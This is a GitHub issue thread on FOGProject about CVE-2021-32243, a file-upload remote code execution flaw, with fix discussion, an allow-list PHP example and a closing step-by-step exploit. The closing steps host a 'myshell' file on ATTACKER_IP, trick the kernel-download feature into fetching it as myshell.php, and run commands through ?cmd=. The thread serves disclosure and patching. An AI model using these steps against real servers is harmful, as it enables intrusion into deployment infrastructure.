FOGProject 1.5.9 - File Upload RCE (Authenticated) #422
I want to understand this more fully, as I will admit I'm not fully versed in how to prevent RCE. What I'm gathering is that to get this to run, you need to:
@mastacontrola Interesting. Someone with the pseudonym LaCashita contacted me in the FOG forums chat to report exactly this issue in February this year. To fix this issue I committed (and tested!) c41006e. I am fairly sure it does prevent that particular issue reported here. Now you added bb4b762, which essentially just reverts the logic of the URL check. It's probably easier to comprehend the logic this way, so that's good. Though I don't understand why you switched to use
The only reason I switched to stripos was that I was under the impression the checks you are referencing were not working. So I just made the search case-insensitive.
Ok, good to know. I think we can just leave it like that. Closing this issue now.
I think this might be an incomplete fix. First, the filename: I had a look at a fresh Ubuntu 18.04 + Apache installation and found the following in So, in addition to I guess using randomly generated names is not easily possible. But is it possible to forbid suffixes completely? Or, alternatively, to only allow a list of known suffixes? Second, the URL check: it can likely be circumvented by adding the FOG URL inside the malicious URL, for example: I must admit I have not tested this, so there might be some code that prevents this. However, this is easy to fix by switching to
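A concrete form of the two suggestions in the comment above (forbid or allow-list filename suffixes; compare the parsed host instead of searching the raw URL string), written as an added example rather than FOG project code and not the fix in c41006e or bb4b762. The allowed host list, the suffix rule and the sample inputs are assumptions, not values taken from the FOG source.

```php
<?php
// Added example, not FOG project code. Two allow-list checks for the
// kernel-download feature discussed in this issue. The host list, the
// suffix rule and the sample inputs are assumptions, not values taken
// from the FOG source.
declare(strict_types=1);

// Hosts a kernel may be fetched from (assumed; FOG's real list may differ).
const ALLOWED_KERNEL_HOSTS = ['fogproject.org'];

/**
 * Accept a kernel name only if it contains no path separators and either
 * no suffix at all or exactly one suffix from $allowedSuffixes. Refusing
 * more than one dot sidesteps Apache's multi-extension handling, where a
 * name such as "x.php.img" is still handed to the PHP handler.
 */
function isSafeKernelName(string $name, array $allowedSuffixes = []): bool
{
    if ($name === '' || strlen($name) > 64) {
        return false;
    }
    if (strpbrk($name, "/\\\0") !== false) {      // no directories, no NUL byte
        return false;
    }
    $parts = explode('.', $name);
    if (count($parts) > 2 || !preg_match('/^[A-Za-z0-9_-]+$/', $parts[0])) {
        return false;
    }
    if (count($parts) === 1) {
        return true;                              // bare name, e.g. bzImage32
    }
    return in_array(strtolower($parts[1]), $allowedSuffixes, true);
}

/**
 * Compare the parsed scheme and host against the allow-list instead of
 * searching the raw string, so a trusted URL embedded inside an untrusted
 * one (for example in a query parameter) does not pass the check.
 */
function isAllowedKernelUrl(string $url, array $allowedHosts = ALLOWED_KERNEL_HOSTS): bool
{
    $p = parse_url($url);
    if ($p === false || !isset($p['scheme'], $p['host'])) {
        return false;
    }
    if (strtolower($p['scheme']) !== 'https') {
        return false;
    }
    if (isset($p['user']) || isset($p['pass']) || isset($p['port'])) {
        return false;                             // only a bare host is compared
    }
    return in_array(strtolower($p['host']), $allowedHosts, true);
}

// Constructed sample inputs (not taken from the issue report).
$nameCases = [
    'bzImage32'   => true,
    'myshell.php' => false,
    'x.php.img'   => false,
    '../bzImage'  => false,
];
$urlCases = [
    'https://fogproject.org/kernels/bzImage'               => true,
    'http://192.0.2.10/myshell'                             => false, // wrong scheme and host
    'https://192.0.2.10/myshell?u=https://fogproject.org/'  => false, // trusted URL only embedded
];
foreach ($nameCases as $n => $want) {
    assert(isSafeKernelName($n) === $want);
    printf("%-55s %s\n", $n, isSafeKernelName($n) ? 'accept' : 'reject');
}
foreach ($urlCases as $u => $want) {
    assert(isAllowedKernelUrl($u) === $want);
    printf("%-55s %s\n", $u, isAllowedKernelUrl($u) ? 'accept' : 'reject');
}
```

Run it with `php example.php`; each sample line prints accept or reject and the assertions fail loudly if a check disagrees with the expected verdict. The point of `isAllowedKernelUrl` is that `parse_url` yields one host for the whole URL, so a substring search such as `stripos` is never consulted and the embedded-URL case from the comment above is rejected on host comparison alone.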
@georgschoelly Thanks for your input on this!
Thanks a lot!
This CVE-2021-32243 has been fixed in 1.5.10 (2023-03-05).
1. Create an empty 10Mb file:
   dd if=/dev/zero of=myshell bs=10485760 count=1
2. Add your PHP code to the end of the file created in step 1:
   echo '' >> myshell
3. Make the file "myshell" accessible through HTTP:
   $ cp myshell /var/www/html
4. Encode the URL of the "myshell" file in base64 (replacing the attacker IP):
   $ echo "http://ATTACKER_IP/myshell" | base64
   aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo=
5. Visit
   http://VICTIM_IP/fog/management/index.php?node=about&sub=kernel&file=<YOUR_MYSHELL_URL_HERE>=&arch=arm64
   Example:
   http://192.168.1.120/fog/management/index.php?node=about&sub=kernel&file=aHR0cDovLzE5Mi4xNjguMS4xMDIvbXlzaGVsbAo=&arch=arm64
6. A textbox appears; change the Kernel Name (bzImage32) to myshell.php and click on Install.
7. Visit http://VICTIM_IP/fog/service/ipxe/myshell.php?cmd=whoami to execute the system command whoami.